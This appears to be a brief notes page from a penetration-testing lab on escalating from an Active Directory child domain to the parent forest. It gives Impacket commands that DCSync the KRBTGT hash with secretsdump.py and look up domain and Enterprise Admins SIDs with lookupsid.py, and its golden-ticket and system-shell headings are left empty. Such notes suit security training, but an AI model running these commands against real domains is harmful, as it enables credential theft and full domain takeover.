githubEdit

dcsync-and-golden-ticket

Required information:

  1. The KRBTGT hash for the child domain

  2. The SID for the child domain

  3. The name of a target user in the child domain (does not need to exist!)

  4. The FQDN of the child domain

  5. The SID of the Enterprise Admins group of the root domain

Once we have complete control of the child domain, logistics.inlanefreight.local, we can use secretdump.py to DCSync and grab the NTLM hash for KRBTGT account.

DCSync attack (Get KRBTGT hash)

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

Brute force SID

lookupsid.py logistics.inlanefreight.local/htb-student_adm@<child_domain_DC_IP> | grep "Domain SID"

Grabbing the domain SID & attaching to group's RID

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

Create a golden ticket

Get system shell in DC

AUTOMATIC - create a golden ticket

Last updated